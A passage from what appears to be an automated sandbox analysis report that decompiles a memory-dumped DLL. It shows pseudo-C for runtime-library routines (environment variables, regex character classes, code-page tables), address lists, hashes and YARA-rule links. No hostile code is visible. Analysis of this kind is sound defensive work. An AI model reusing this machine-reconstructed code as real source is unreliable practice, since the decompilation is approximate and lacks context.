																																	E6E1D1BE4(0);
																																	_t324 = _t322 + 0xc;
																																	__eflags =  *(_t226 + _t291);
																																	if( *(_t226 + _t291) == 0) {
																																		goto L118;
																																	} else {
																																		_t175 = E6E1CB0B9( *(_t226 + _t291), _v24,  *_t291);
																																		_t322 = _t324 + 0xc;
																																		__eflags = _t175;
																																		if(_t175 != 0) {
																																			L119:
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			E6E1C22EF();
																																			asm("int3");
																																			_t166 =  *0x6e22204c; // 0x5ad788
																																			__eflags = _t166 -  *0x6e222058; // 0x5ad788
																																			if(__eflags == 0) {
																																				_push(_t166);
																																				L86();
																																				 *0x6e22204c = _t166;
																																				return _t166;
																																			}
																																			return _t166;
																																		} else {
																																			goto L115;
																																		}
																																	}
																																	goto L123;
																																	L115:
																																	_t291 = _t291 + 4;
																																	_t267 =  *_t291;
																																	__eflags = _t267;
																																} while (_t267 != 0);
																																goto L117;
																															}
																														}
																													} else {
																														_t169 = 0;
																														__eflags = 0;
																														L105:
																														return _t169;
																													}
																												} else {
																													goto L98;
																												}
																											}
																											goto L123;
																											L98:
																											_t290 = _t290 + 4;
																											_t270 =  *_t290;
																											__eflags = _t270;
																										} while (_t270 != 0);
																										goto L100;
																									}
																								}
																							} else {
																								_t177 = 0;
																								__eflags = 0;
																								L88:
																								return _t177;
																							}
																						} else {
																							_t272 =  &(_t302[_v20 + 1]);
																							 *((short*)(_t272 - 2)) = 0;
																							asm("sbb eax, eax");
																							__eflags = SetEnvironmentVariableW(_t302,  ~(_v24 & 0x0000ffff) & _t272);
																							if(__eflags == 0) {
																								_t191 = E6E1C23F4(__eflags);
																								_t226 = _t226 | 0xffffffff;
																								__eflags = _t226;
																								 *_t191 = 0x2a;
																							}
																							goto L80;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t196 =  *0x6e22204c; // 0x5ad788
																		__eflags = _a4;
																		if(_a4 == 0) {
																			L52:
																			__eflags = _v16 - _t226;
																			if(_v16 != _t226) {
																				__eflags = _t196;
																				if(_t196 != 0) {
																					L57:
																					 *0x6e222050 = E6E1D16BE(1, 4);
																					E6E1D1BE4(_t226);
																					_t320 = _t320 + 0xc;
																					goto L58;
																				} else {
																					 *0x6e22204c = E6E1D16BE(1, 4);
																					E6E1D1BE4(_t226);
																					_t320 = _t320 + 0xc;
																					__eflags =  *0x6e22204c - _t226; // 0x5ad788
																					if(__eflags == 0) {
																						goto L82;
																					} else {
																						_t300 =  *0x6e222050; // 0x0
																						__eflags = _t300;
																						if(_t300 != 0) {
																							goto L59;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				_t226 = 0;
																				goto L83;
																			}
																		} else {
																			__eflags = _t196;
																			if(_t196 == 0) {
																				goto L52;
																			} else {
																				__eflags = L6E1CE7D4(0, _t327);
																				if(__eflags == 0) {
																					goto L81;
																				} else {
																					E6E1DD151();
																					L58:
																					_t300 =  *0x6e222050; // 0x0
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L82:
																						_t226 = _t225 | 0xffffffff;
																						__eflags = _t226;
																						L83:
																						E6E1D1BE4(_t288);
																						_t138 = _t226;
																						goto L84;
																					} else {
																						goto L59;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t203 = E6E1C23F4(__eflags);
															 *_t203 = 0x16;
															_t138 = _t203 | 0xffffffff;
															L84:
															return _t138;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t298 - _a4 - 1) = _t222;
														__eflags = E6E1E5991(_v20 + 1 + _t298 - _a4, _t282, __eflags, _t298,  ~_v5 & _v20 + 0x00000001 + _t298 - _a4);
														if(__eflags == 0) {
															_t210 = E6E1C23F4(__eflags);
															_t223 = _t222 | 0xffffffff;
															__eflags = _t223;
															 *_t210 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t222;
									if(_v5 != _t222) {
										 *0x6e22204c = E6E1D16BE(1, 4);
										E6E1D1BE4(_t222);
										_t317 = _t317 + 0xc;
										__eflags =  *0x6e22204c - _t222; // 0x5ad788
										if(__eflags == 0) {
											L39:
											_t223 = _t222 | 0xffffffff;
											__eflags = _t223;
											goto L40;
										} else {
											__eflags =  *0x6e222050 - _t222; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x6e222050 = E6E1D16BE(1, 4);
												E6E1D1BE4(_t222);
												_t317 = _t317 + 0xc;
												__eflags =  *0x6e222050 - _t222; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t223 = 0;
										L40:
										E6E1D1BE4(_t286);
										_t119 = _t223;
										goto L41;
									}
								} else {
									__eflags =  *0x6e222050 - _t222; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L6E1CE7CF(0, __fp0);
										if(__eflags == 0) {
											goto L38;
										} else {
											L120();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t221 = E6E1C23F4(_t326);
					 *_t221 = 0x16;
					_t119 = _t221 | 0xffffffff;
					L41:
					return _t119;
				}
				L123:
			}

0x6e1dcb38
0x6e1dcb38
0x6e1dcb3b
0x6e1dcb3d
0x6e1dcb41
0x6e1dcb44
0x6e1dcb46
0x6e1dcb5b
0x6e1dcb60
0x6e1dcb62
0x6e1dcb67
0x6e1dcb6c
0x6e1dcb6e
0x6e1dcd4f
0x6e1dcd54
0x00000000
0x6e1dcb74
0x6e1dcb74
0x6e1dcb76
0x00000000
0x6e1dcb7c
0x6e1dcb7f
0x6e1dcb82
0x6e1dcb87
0x6e1dcb89
0x6e1dcb8f
0x6e1dcc0c
0x6e1dcc0c
0x6e1dcc11
0x6e1dcc14
0x6e1dcc16
0x00000000
0x6e1dcc1c
0x6e1dcc23
0x6e1dcc28
0x6e1dcc2d
0x6e1dcc30
0x6e1dcc32
0x6e1dcc83
0x6e1dcc83
0x6e1dcc86
0x00000000
0x6e1dcc8c
0x6e1dcc8c
0x6e1dcc8e
0x6e1dcc91
0x6e1dcc91
0x6e1dcc94
0x6e1dcc96
0x00000000
0x6e1dcc9c
0x6e1dcc9c
0x6e1dcca2
0x00000000
0x6e1dcca8
0x6e1dccb2
0x6e1dccb5
0x6e1dccba
0x6e1dccbd
0x6e1dccc0
0x6e1dccc2
0x00000000
0x6e1dccc8
0x6e1dccc8
0x6e1dcccb
0x6e1dcccd
0x6e1dccd0
0x00000000
0x6e1dccd0
0x6e1dccc2
0x6e1dcca2
0x6e1dcc96
0x6e1dcc34
0x6e1dcc34
0x6e1dcc36
0x00000000
0x6e1dcc38
0x6e1dcc3b
0x6e1dcc41
0x6e1dcc44
0x6e1dcc47
0x6e1dcc7c
0x6e1dcc7e
0x6e1dcc49
0x6e1dcc49
0x6e1dcc56
0x6e1dcc56
0x6e1dcc59
0x00000000
0x00000000
0x6e1dcc52
0x6e1dcc55
0x6e1dcc55
0x6e1dcc55
0x6e1dcc65
0x6e1dcc68
0x6e1dcc6d
0x6e1dcc70
0x6e1dcc73
0x6e1dcc75
0x6e1dccd4
0x6e1dccd4
0x6e1dccd4
0x6e1dcc75
0x6e1dccd9
0x6e1dccdc
0x00000000
0x6e1dccde
0x6e1dccde
0x6e1dcce1
0x6e1dcce1
0x6e1dcce3
0x6e1dcce4
0x6e1dcce4
0x6e1dccf0
0x6e1dccf8
0x6e1dccfb
0x6e1dccfc
0x6e1dccfe
0x6e1dcd46
0x6e1dcd47
0x00000000
0x6e1dcd00
0x6e1dcd07
0x6e1dcd0c
0x6e1dcd0f
0x6e1dcd11
0x6e1dcd6b
0x6e1dcd6c
0x6e1dcd6d
0x6e1dcd6e
0x6e1dcd6f
0x6e1dcd70
0x6e1dcd75
0x6e1dcd78
0x6e1dcd79
0x6e1dcd7b
0x6e1dcd7e
0x6e1dcd7f
0x6e1dcd82
0x6e1dcd84
0x6e1dcd99
0x6e1dcd9a
0x6e1dcd9b
0x6e1dcd9d
0x6e1dcd9e
0x6e1dcda0
0x6e1dcda5
0x6e1dcdaa
0x6e1dcdac
0x6e1dcfa2
0x6e1dcfa7
0x00000000
0x6e1dcdb2
0x6e1dcdb2
0x6e1dcdb4
0x00000000
0x6e1dcdba
0x6e1dcdbe
0x6e1dcdc0
0x6e1dcdc3
0x6e1dcdc6
0x6e1dcdcb
0x6e1dcdd1
0x6e1dcdd3
0x6e1dcdd5
0x6e1dce60
0x6e1dce6b
0x6e1dce6e
0x6e1dce73
0x6e1dce78
0x6e1dce7a
0x6e1dcec8
0x6e1dcec8
0x6e1dcecc
0x00000000
0x6e1dced2
0x6e1dced2
0x6e1dced4
0x6e1dced7
0x6e1dced7
0x6e1dceda
0x6e1dcedc
0x00000000
0x6e1dcee2
0x6e1dcee2
0x6e1dcee8
0x00000000
0x6e1dceee
0x6e1dcef8
0x6e1dcefa
0x6e1dceff
0x6e1dcf02
0x6e1dcf04
0x00000000
0x6e1dcf0a
0x6e1dcf0a
0x6e1dcf0d
0x6e1dcf0f
0x6e1dcf12
0x6e1dcf15
0x00000000
0x6e1dcf15
0x6e1dcf04
0x6e1dcee8
0x6e1dcedc
0x6e1dce7c
0x6e1dce7c
0x6e1dce7e
0x00000000
0x6e1dce80
0x6e1dce83
0x6e1dce89
0x6e1dce8c
0x6e1dce90
0x6e1dcea7
0x6e1dcea7
0x6e1dceaa
0x00000000
0x00000000
0x6e1dcea3
0x6e1dcea6
0x6e1dcea6
0x6e1dcea6
0x6e1dceb6
0x6e1dceb8
0x6e1dcebd
0x6e1dcec0
0x6e1dcec2
0x6e1dcec4
0x6e1dcf19
0x6e1dcf19
0x6e1dcf19
0x6e1dce92
0x6e1dce92
0x6e1dce95
0x6e1dce97
0x6e1dce97
0x6e1dcf1f
0x6e1dcf22
0x00000000
0x6e1dcf28
0x6e1dcf28
0x6e1dcf2a
0x6e1dcf2a
0x6e1dcf2d
0x6e1dcf2d
0x6e1dcf30
0x6e1dcf33
0x6e1dcf33
0x6e1dcf3e
0x6e1dcf42
0x6e1dcf4a
0x6e1dcf4d
0x6e1dcf4e
0x6e1dcf50
0x6e1dcf99
0x6e1dcf9a
0x00000000
0x6e1dcf52
0x6e1dcf5a
0x6e1dcf5f
0x6e1dcf62
0x6e1dcf64
0x6e1dcfbe
0x6e1dcfbf
0x6e1dcfc0
0x6e1dcfc1
0x6e1dcfc2
0x6e1dcfc3
0x6e1dcfc8
0x6e1dcfcb
0x6e1dcfcc
0x6e1dcfcf
0x6e1dcfd0
0x6e1dcfd3
0x6e1dcfd5
0x6e1dcfdc
0x6e1dcfde
0x6e1dcfe0
0x6e1dcfe2
0x6e1dcfe4
0x6e1dcfe4
0x6e1dcfe7
0x6e1dcfe8
0x6e1dcfe8
0x6e1dcfe4
0x6e1dcfee
0x6e1dcff9
0x6e1dcffc
0x6e1dcffd
0x6e1dcfff
0x6e1dd067
0x6e1dd067
0x00000000
0x6e1dd001
0x6e1dd001
0x6e1dd003
0x6e1dd005
0x6e1dd057
0x6e1dd059
0x6e1dd05f
0x00000000
0x6e1dd007
0x6e1dd007
0x6e1dd00a
0x6e1dd00a
0x6e1dd00c
0x6e1dd00c
0x6e1dd00c
0x6e1dd00f
0x6e1dd00f
0x6e1dd011
0x6e1dd012
0x6e1dd012
0x6e1dd016
0x6e1dd01a
0x6e1dd01e
0x6e1dd028
0x6e1dd02b
0x6e1dd030
0x6e1dd033
0x6e1dd037
0x00000000
0x6e1dd039
0x6e1dd041
0x6e1dd046
0x6e1dd049
0x6e1dd04b
0x6e1dd06c
0x6e1dd06e
0x6e1dd06f
0x6e1dd070
0x6e1dd071
0x6e1dd072
0x6e1dd073
0x6e1dd078
0x6e1dd07b
0x6e1dd07e
0x6e1dd07f
0x6e1dd080
0x6e1dd081
0x6e1dd084
0x6e1dd086
0x6e1dd08d
0x6e1dd08f
0x6e1dd091
0x6e1dd093
0x6e1dd096
0x6e1dd098
0x6e1dd09a
0x6e1dd09a
0x6e1dd09d
0x6e1dd09e
0x6e1dd09e
0x6e1dd09a
0x6e1dd0a3
0x6e1dd0ae
0x6e1dd0b1
0x6e1dd0b2
0x6e1dd0b4
0x6e1dd125
0x6e1dd125
0x00000000
0x6e1dd0b6
0x6e1dd0b6
0x6e1dd0b8
0x6e1dd0ba
0x6e1dd114
0x6e1dd117
0x6e1dd11d
0x00000000
0x6e1dd0bc
0x6e1dd0bc
0x6e1dd0bf
0x6e1dd0bf
0x6e1dd0c1
0x6e1dd0c1
0x6e1dd0c1
0x6e1dd0c4
0x6e1dd0c4
0x6e1dd0c7
0x6e1dd0ca
0x6e1dd0ca
0x6e1dd0d6
0x6e1dd0da
0x6e1dd0e2
0x6e1dd0e8
0x6e1dd0ed
0x6e1dd0f0
0x6e1dd0f4
0x00000000
0x6e1dd0f6
0x6e1dd0fe
0x6e1dd103
0x6e1dd106
0x6e1dd108
0x6e1dd12a
0x6e1dd12c
0x6e1dd12d
0x6e1dd12e
0x6e1dd12f
0x6e1dd130
0x6e1dd131
0x6e1dd136
0x6e1dd137
0x6e1dd13c
0x6e1dd142
0x6e1dd144
0x6e1dd145
0x6e1dd14b
0x00000000
0x6e1dd14b
0x6e1dd150
0x00000000
0x00000000
0x00000000
0x6e1dd108
0x00000000
0x6e1dd10a
0x6e1dd10a
0x6e1dd10d
0x6e1dd10f
0x6e1dd10f
0x00000000
0x6e1dd113
0x6e1dd0ba
0x6e1dd088
0x6e1dd088
0x6e1dd088
0x6e1dd08a
0x6e1dd08c
0x6e1dd08c
0x00000000
0x00000000
0x00000000
0x6e1dd04b
0x00000000
0x6e1dd04d
0x6e1dd04d
0x6e1dd050
0x6e1dd052
0x6e1dd052
0x00000000
0x6e1dd056
0x6e1dd005
0x6e1dcfd7
0x6e1dcfd7
0x6e1dcfd7
0x6e1dcfd9
0x6e1dcfdb
0x6e1dcfdb
0x6e1dcf66
0x6e1dcf6a
0x6e1dcf6f
0x6e1dcf7b
0x6e1dcf87
0x6e1dcf89
0x6e1dcf8b
0x6e1dcf90
0x6e1dcf90
0x6e1dcf93
0x6e1dcf93
0x00000000
0x6e1dcf89
0x6e1dcf64
0x6e1dcf50
0x6e1dcf22
0x6e1dce7e
0x6e1dcddb
0x6e1dcddb
0x6e1dcde0
0x6e1dcde3
0x6e1dcdfd
0x6e1dcdfd
0x6e1dce01
0x6e1dce0a
0x6e1dce0c
0x6e1dce3b
0x6e1dce45
0x6e1dce4a
0x6e1dce4f
0x00000000
0x6e1dce0e
0x6e1dce18
0x6e1dce1d
0x6e1dce22
0x6e1dce25
0x6e1dce2b
0x00000000
0x6e1dce31
0x6e1dce31
0x6e1dce37
0x6e1dce39
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1dce39
0x6e1dce2b
0x6e1dce03
0x6e1dce03
0x00000000
0x6e1dce03
0x6e1dcde5
0x6e1dcde5
0x6e1dcde7
0x00000000
0x6e1dcde9
0x6e1dcdee
0x6e1dcdf0
0x00000000
0x6e1dcdf6
0x6e1dcdf6
0x6e1dce52
0x6e1dce52
0x6e1dce58
0x6e1dce5a
0x6e1dcfad
0x6e1dcfad
0x6e1dcfad
0x6e1dcfb0
0x6e1dcfb1
0x6e1dcfb8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1dce5a
0x6e1dcdf0
0x6e1dcde7
0x6e1dcde3
0x6e1dcdd5
0x6e1dcdb4
0x6e1dcd86
0x6e1dcd86
0x6e1dcd8b
0x6e1dcd91
0x6e1dcfbb
0x6e1dcfbd
0x6e1dcfbd
0x6e1dcd13
0x6e1dcd24
0x6e1dcd28
0x6e1dcd34
0x6e1dcd36
0x6e1dcd38
0x6e1dcd3d
0x6e1dcd3d
0x6e1dcd40
0x6e1dcd40
0x00000000
0x6e1dcd36
0x6e1dcd11
0x6e1dccfe
0x6e1dccdc
0x6e1dcc36
0x6e1dcc32
0x6e1dcb91
0x6e1dcb91
0x6e1dcb94
0x6e1dcbb2
0x6e1dcbb2
0x6e1dcbb5
0x6e1dcbc8
0x6e1dcbcd
0x6e1dcbd2
0x6e1dcbd5
0x6e1dcbdb
0x6e1dcd5a
0x6e1dcd5a
0x6e1dcd5a
0x00000000
0x6e1dcbe1
0x6e1dcbe1
0x6e1dcbe7
0x00000000
0x6e1dcbe9
0x6e1dcbf3
0x6e1dcbf8
0x6e1dcbfd
0x6e1dcc00
0x6e1dcc06
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1dcc06
0x6e1dcbe7
0x6e1dcbb7
0x6e1dcbb7
0x6e1dcd5d
0x6e1dcd5e
0x6e1dcd65
0x00000000
0x6e1dcd67
0x6e1dcb96
0x6e1dcb96
0x6e1dcb9c
0x00000000
0x6e1dcb9e
0x6e1dcba3
0x6e1dcba5
0x00000000
0x6e1dcbab
0x6e1dcbab
0x00000000
0x6e1dcbab
0x6e1dcba5
0x6e1dcb9c
0x6e1dcb94
0x6e1dcb8f
0x6e1dcb76
0x6e1dcb48
0x6e1dcb48
0x6e1dcb4d
0x6e1dcb53
0x6e1dcd68
0x6e1dcd6a
0x6e1dcd6a
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 6E1DCB62
_free.LIBCMT ref: 6E1DCC3B
_free.LIBCMT ref: 6E1DCC68

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: bba169f7ef82aa3833614f9e20b4b0e247a725f1aab69124fe5bd2b880ed427f
Instruction ID: e8b74021ed740b6f14c8115482fad88aec698deb240210f16ddb1250d8c4f86e
Opcode Fuzzy Hash: bba169f7ef82aa3833614f9e20b4b0e247a725f1aab69124fe5bd2b880ed427f
Instruction Fuzzy Hash: 19D106B1A046019FDB10DFE88850BDE7BB9EF16314B104D5AE610DF280EB7595C9EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E18E84C, Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E6E18E84C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t18;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr* _t44;
				signed int _t46;
				void* _t47;

				_t41 = __ecx;
				E6E1A9DBF(0x6e1eb972, __ebx, __edi, __esi, 4);
				_t44 = _t41;
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				 *_t44 = 0x6e20eb34;
				_t46 = 0;
				 *(_t47 - 4) = 0;
				 *((intOrPtr*)(_t44 + 8)) =  *((intOrPtr*)(_t47 + 0xc));
				_t18 =  *((intOrPtr*)(_t47 + 8));
				 *_t44 = 0x6e1fc860;
				_t42 =  *((intOrPtr*)(_t18 + 1));
				_t40 = (_t42 == 0x5e) + _t18 + 1;
				 *(_t44 + 0xc) = 0 | _t42 != 0x0000005e;
				if(E6E1C1260((_t42 == 0x5e) + _t18 + 1, "alnum:", 6) != 0) {
					if(E6E1C1260(_t40, "alpha:", 6) != 0) {
						if(E6E1C1260(_t40, "ascii:", 6) != 0) {
							if(E6E1C1260(_t40, "cntrl:", 6) != 0) {
								if(E6E1C1260(_t40, "digit:", 6) != 0) {
									if(E6E1C1260(_t40, "graph:", 6) != 0) {
										if(E6E1C1260(_t40, "lower:", 6) != 0) {
											if(E6E1C1260(_t40, "print:", 6) != 0) {
												if(E6E1C1260(_t40, "punct:", 6) != 0) {
													if(E6E1C1260(_t40, "space:", 6) != 0) {
														if(E6E1C1260(_t40, "upper:", 6) != 0) {
															if(E6E1C1260(_t40, "xdigit:", 7) != 0) {
																if(E6E1C1260(_t40, "blank:", 6) == 0) {
																	_t46 = 0x6e17c694;
																}
															} else {
																_t46 = E6E1B663F;
															}
														} else {
															_t46 = E6E1B660E;
														}
													} else {
														_t46 = E6E1B65DD;
													}
												} else {
													_t46 = E6E1B65AC;
												}
											} else {
												_t46 = E6E1B6578;
											}
										} else {
											_t46 = E6E1B6547;
										}
									} else {
										_t46 = E6E1B6513;
									}
								} else {
									_t46 = E6E1B64E2;
								}
							} else {
								_t46 = E6E1B64B1;
							}
						} else {
							_t46 = E6E1B6085;
						}
					} else {
						_t46 = E6E1B647D;
					}
				} else {
					_t46 = E6E1B6449;
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t44 + 4)) = _t46;
				return E6E1A9D88(_t44);
			}

0x6e18e84c
0x6e18e853
0x6e18e858
0x6e18e85a
0x6e18e85d
0x6e18e863
0x6e18e865
0x6e18e86d
0x6e18e870
0x6e18e873
0x6e18e880
0x6e18e88a
0x6e18e895
0x6e18e8a2
0x6e18e8c0
0x6e18e8de
0x6e18e8fc
0x6e18e91a
0x6e18e938
0x6e18e956
0x6e18e974
0x6e18e992
0x6e18e9ad
0x6e18e9c8
0x6e18e9e3
0x6e18e9fe
0x6e18ea00
0x6e18ea00
0x6e18e9e5
0x6e18e9e5
0x6e18e9e5
0x6e18e9ca
0x6e18e9ca
0x6e18e9ca
0x6e18e9af
0x6e18e9af
0x6e18e9af
0x6e18e994
0x6e18e994
0x6e18e994
0x6e18e976
0x6e18e976
0x6e18e976
0x6e18e958
0x6e18e958
0x6e18e958
0x6e18e93a
0x6e18e93a
0x6e18e93a
0x6e18e91c
0x6e18e91c
0x6e18e91c
0x6e18e8fe
0x6e18e8fe
0x6e18e8fe
0x6e18e8e0
0x6e18e8e0
0x6e18e8e0
0x6e18e8c2
0x6e18e8c2
0x6e18e8c2
0x6e18e8a4
0x6e18e8a4
0x6e18e8a4
0x6e18ea05
0x6e18ea0b
0x6e18ea13

APIs

__EH_prolog3.LIBCMT ref: 6E18E853

Strings

blank:, xrefs: 6E18E9EE
alpha:, xrefs: 6E18E8B0
space:, xrefs: 6E18E99D
punct:, xrefs: 6E18E982
xdigit:, xrefs: 6E18E9D3
lower:, xrefs: 6E18E946
digit:, xrefs: 6E18E90A
ascii:, xrefs: 6E18E8CE
cntrl:, xrefs: 6E18E8EC
graph:, xrefs: 6E18E928
print:, xrefs: 6E18E964
upper:, xrefs: 6E18E9B8
alnum:, xrefs: 6E18E87B

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: alnum:$alpha:$ascii:$blank:$cntrl:$digit:$graph:$lower:$print:$punct:$space:$upper:$xdigit:
API String ID: 431132790-1202943499
Opcode ID: c855eec844a3a270c688f2fbfb5b2af5cf9d118828fa3982ed3f0bec409ad392
Instruction ID: e27eabd6c7dc2926a329a25b682f4f32e7485840d1621be5db99a381ecbcb5a1
Opcode Fuzzy Hash: c855eec844a3a270c688f2fbfb5b2af5cf9d118828fa3982ed3f0bec409ad392
Instruction Fuzzy Hash: D3413CD5E98305E6D22085F59C49B8775AC1B30B84F160910ED07FE3C6F366CAD4B9CA

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C2566, Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E1C2566(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char* _v80;
				char* _v84;
				void* _v88;
				char _v92;
				signed int _t126;
				intOrPtr* _t131;
				char _t148;
				signed short _t151;
				signed int _t152;
				void* _t154;
				void* _t157;
				void* _t160;
				void* _t161;
				void* _t165;
				signed int _t166;
				intOrPtr* _t167;
				signed char _t184;
				signed int* _t187;
				void* _t191;
				char _t196;
				signed char _t198;
				void* _t205;
				char _t207;
				void* _t209;
				signed int* _t211;
				void* _t214;
				intOrPtr _t215;
				intOrPtr _t219;
				short* _t223;
				intOrPtr _t224;
				signed int _t225;
				signed int _t232;
				char* _t233;
				intOrPtr _t234;
				void* _t238;
				signed char _t239;
				signed char* _t240;
				void* _t242;
				char* _t244;
				char* _t245;
				signed char* _t256;
				void* _t258;
				intOrPtr* _t260;
				intOrPtr* _t264;
				signed int _t265;
				short* _t266;
				signed int _t269;
				signed int _t270;
				void* _t271;
				void* _t272;

				_t304 = __fp0;
				_t126 =  *0x6e21801c; // 0xd8901f95
				_v8 = _t126 ^ _t270;
				_t260 = _a4;
				_t207 = 0;
				_v56 = _t260;
				_t242 = 0;
				_v32 = 0;
				_t215 =  *((intOrPtr*)(_t260 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t260;
				_v88 = 0;
				if(_t215 == 0) {
					__eflags =  *((intOrPtr*)(_t260 + 0x8c));
					if( *((intOrPtr*)(_t260 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t260 + 0x8c)) = _t207;
					__eflags = 0;
					 *((intOrPtr*)(_t260 + 0x90)) = _t207;
					 *_t260 = 0x6e1f3b30;
					 *((intOrPtr*)(_t260 + 0x94)) = 0x6e1f3db0;
					 *((intOrPtr*)(_t260 + 0x98)) = 0x6e1f3f30;
					 *((intOrPtr*)(_t260 + 4)) = 1;
					L48:
					return E6E1A93EA(_v8 ^ _t270);
				}
				_t131 = _t260 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E6E1D16BE(1, 4);
					E6E1D1BE4(_t207);
					_v32 = E6E1D16BE(0x180, 2);
					E6E1D1BE4(_t207);
					_t242 = E6E1D16BE(0x180, 1);
					_v44 = _t242;
					E6E1D1BE4(_t207);
					_v36 = E6E1D16BE(0x180, 1);
					E6E1D1BE4(_t207);
					_v40 = E6E1D16BE(0x101, 1);
					E6E1D1BE4(_t207);
					_t272 = _t271 + 0x3c;
					if(_v52 == _t207 || _v32 == _t207) {
						L43:
						E6E1D1BE4(_v52);
						E6E1D1BE4(_v32);
						E6E1D1BE4(_t242);
						E6E1D1BE4(_v36);
						_t207 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t219 = _v40;
						if(_t219 == 0 || _t242 == 0 || _v36 == _t207) {
							goto L43;
						} else {
							_t148 = _t207;
							do {
								 *((char*)(_t148 + _t219)) = _t148;
								_t148 = _t148 + 1;
							} while (_t148 < 0x100);
							if(GetCPInfo( *(_t260 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t151 = _v28;
							if(_t151 > 5) {
								goto L43;
							}
							_t152 = _t151 & 0x0000ffff;
							_v60 = _t152;
							if(_t152 <= 1) {
								L22:
								_t37 = _t242 + 0x81; // 0x81
								_v48 = _v40 + 1;
								_t154 = E6E1D1AAF(_t207, _t242, _t260, _t290, _t304, _t207,  *((intOrPtr*)(_t260 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t260 + 8), _t207);
								_t272 = _t272 + 0x24;
								_t291 = _t154;
								if(_t154 == 0) {
									goto L43;
								}
								_t157 = E6E1D1AAF(_t207, _t242, _t260, _t291, _t304, _t207,  *((intOrPtr*)(_t260 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t260 + 8), _t207);
								_t272 = _t272 + 0x24;
								_t292 = _t157;
								if(_t157 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t160 = E6E1D3BB2(_t207, _t242, _t260, _t292, _t207, 1, _v40, 0x100, _v32 + 0x100,  *(_t260 + 8), _t207);
								_t272 = _t272 + 0x1c;
								if(_t160 == 0) {
									goto L43;
								}
								_t161 = _v32;
								_t223 = _t161 + 0xfe;
								 *_t223 = 0;
								_t238 = _v44;
								_v76 = _t223;
								_t224 = _v36;
								_t244 = _t238 + 0x80;
								 *((char*)(_t238 + 0x7f)) = _t207;
								_v80 = _t244;
								 *((char*)(_t224 + 0x7f)) = _t207;
								 *_t244 = _t207;
								_t245 = _t224 + 0x80;
								_v84 = _t245;
								 *_t245 = _t207;
								if(_v60 <= 1) {
									L39:
									_t225 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t225 << 2);
									_push(0x1f);
									asm("movsw");
									_t165 = memcpy(_t238, _t238 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t166 = memcpy(_t165, _t165 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t264 = _v56;
									if( *((intOrPtr*)(_t264 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t166 | 0xffffffff) == 0) {
											E6E1D1BE4( *((intOrPtr*)(_t264 + 0x90)) - 0xfe);
